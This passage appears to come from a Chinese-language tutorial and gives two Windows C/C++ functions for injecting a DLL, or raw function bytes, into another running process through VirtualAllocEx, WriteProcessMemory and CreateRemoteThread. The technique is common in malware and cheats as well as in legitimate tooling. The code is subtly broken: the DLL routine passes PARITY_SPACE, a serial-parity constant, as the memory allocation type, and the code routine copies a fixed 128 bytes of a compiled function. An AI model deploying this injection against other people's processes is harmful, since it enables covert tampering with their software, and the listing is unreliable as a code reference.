void InjectDLL(DWORD PID,char *Path) { DWORD dwSize; HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,false,PID); dwSize=strlen(Path)+1; LPVOID lpParamAddress=VirtualAllocEx(hProcess,0,dwSize,PARITY_SPACE,PAGE_EXECUTE_READWRITE); WriteProcessMemory(hProcess,lpParamAddress,(PVOID)Path,dwSize,NULL); HMODULE hModule=GetModuleHandleA("kernel32.dll"); LPTHREAD_START_ROUTINE lpStartAddress=(LPTHREAD_START_ROUTINE)GetProcAddress(hModule,"LoadLibraryA"); HANDLE hThread=CreateRemoteThread(hProcess,NULL,0,lpStartAddress,lpParamAddress,0,NULL); WaitForSingleObject(hThread,1000); CloseHandle(hThread); } 另一种是直接注入代码,代码如下: //函数名:InjectCode //功能:封装远程注入的函数 //参数:进程ID //参数:被注入函数指针<函数名> //参数:参数 //参数:参数长度 //************************************************************************************** void InjectCode(DWORD dwProcId,LPVOID mFunc, LPVOID Param, DWORD ParamSize) { HANDLE hProcess;//远程句柄 LPVOID mFuncAddr;//申请函数内存地址 LPVOID ParamAddr;//申请参数内存地址 HANDLE hThread; //线程句柄 DWORD NumberOfByte; //辅助返回值 CString str; //打开被注入的进程句柄 hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcId); //申请内存 mFuncAddr = VirtualAllocEx(hProcess,NULL,128,MEM_COMMIT,PAGE_EXECUTE_READWRITE); ParamAddr = VirtualAllocEx(hProcess,NULL,ParamSize,MEM_COMMIT,PAGE_EXECUTE_READWRITE); //写内存 WriteProcessMemory(hProcess,mFuncAddr,mFunc,128, &NumberOfByte); WriteProcessMemory(hProcess,ParamAddr,Param,ParamSize, &NumberOfByte); //创建远程线程 hThread = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)mFuncAddr, ParamAddr,0,&NumberOfByte); WaitForSingleObject(hThread, INFINITE); //等待线程结束 //释放申请有内存 VirtualFreeEx(hProcess,mFuncAddr,128,MEM_RELEASE); VirtualFreeEx(hProcess,ParamAddr,ParamSize,MEM_RELEASE); //释放远程句柄 CloseHandle(hThread); CloseHandle(hProcess); }